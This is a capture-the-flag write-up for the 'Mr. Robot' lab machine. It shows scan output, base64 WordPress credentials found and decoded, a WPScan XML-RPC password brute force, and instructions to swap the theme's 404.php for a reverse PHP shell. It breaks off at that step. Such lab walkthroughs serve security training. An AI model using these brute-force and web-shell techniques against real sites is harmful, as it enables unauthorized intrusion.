Skip to main content

MrRobot

Box Description

Can you root this Mr. Robot styled machine?

NMAP

  • [SSH: 22 CLOSED/FILTERED] [HTTP: 80] [HTTPS: 443]
Nmap scan report for 10.10.189.35
Host is up (0.093s latency).

PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open   ssl/http Apache httpd
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache

FFUF

  • WordPress User Blog: [IP:80/0]
  • WordPress Login Portal: [IP:80/wp-content]
  • The File Robots.txt is Exposed: [IP:80/robots] 
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.189.35/FUZZ
 :: Wordlist         : FUZZ: Dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
...
0                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 334ms]
wp-content              [Status: 301, Size: 239, Words: 14, Lines: 8, Duration: 505ms]
readme                  [Status: 200, Size: 64, Words: 14, Lines: 2, Duration: 145ms]
robots                  [Status: 200, Size: 41, Words: 2, Lines: 4, Duration: 468ms]
...

  • The File license.txt contains WordPress Credentials Encoded in BASE64: [IP:80/license.txt]
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.189.35/FUZZ
 :: Wordlist         : FUZZ: Seclists/Discovery/Web-Content/QuickHits.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response status: 301,403
________________________________________________
...
/license.txt            [Status: 200, Size: 309, Words: 25, Lines: 157, Duration: 120ms]
...

Content Discovery

  • [IP:80/robots.txt]
  • The File fsocity.dic is a WordList of Possible Usernames - Passwords
User-agent: *
fsocity.dic
  • [IP:80/license.txt]
  • The Text is BASE64 Encoded. After Decoding the Text we can use those Credentials to Login into WordPress Admin Panel.
What you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
Do you want a password or something?

ZWxsaW90OkVSMjgtMDY1Mgo=
┌──────────────────────────┐    ┌──────────────────┐
| ZWxsaW90OkVSMjgtMDY1Mgo= | -| elliot:ER28-0652 |
└──────────────────────────┘    └──────────────────┘

WPScan

  • WordPress Version: 4.3.1
  • XML-RPC Enabled: An Attacker can abuse this Interface to Brute-Force Authentication
[+] URL: http://10.10.189.35/ [10.10.189.35]
[+] Started: Thu Nov  3 11:28:06 2022

[+] XML-RPC seems to be enabled: http://10.10.189.35/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
 | Found By: Rss Generator (Aggressive Detection)
 |  - http://10.10.189.35/feed/, <generator>http://wordpress.org/?v=4.3.1</generator>
 |  - http://10.10.189.35/comments/feed/, <generator>http://wordpress.org/?v=4.3.1</generator>

  • Since the Machine is Based on Mr Robot Theme, we can Assume that the Username is Elliot. Therefore we only need to Brute-Force the Password with the Dictionary fsocity.dic that we found in robots.txt.
  • These are the same Credentials that we found during our Enumeration in license.txt.
[+] Performing password attack on Xmlrpc Multicall against 1 user/s
[SUCCESS] - elliot / ER28-0652

WordPress Exploitation

  • Using WordPress Credentials to Login: elliot:ER28-0652

MR

  • Replacing 404.php with a Reverse PHP Shell
  • WordPress ➜ Appearance ➜ Theme Editor ➜ 404 Template (404.php)
  • Reverse Shell Execution Location: http://IP/blog/wp-content/themes/twentyseventeen/404.php

MR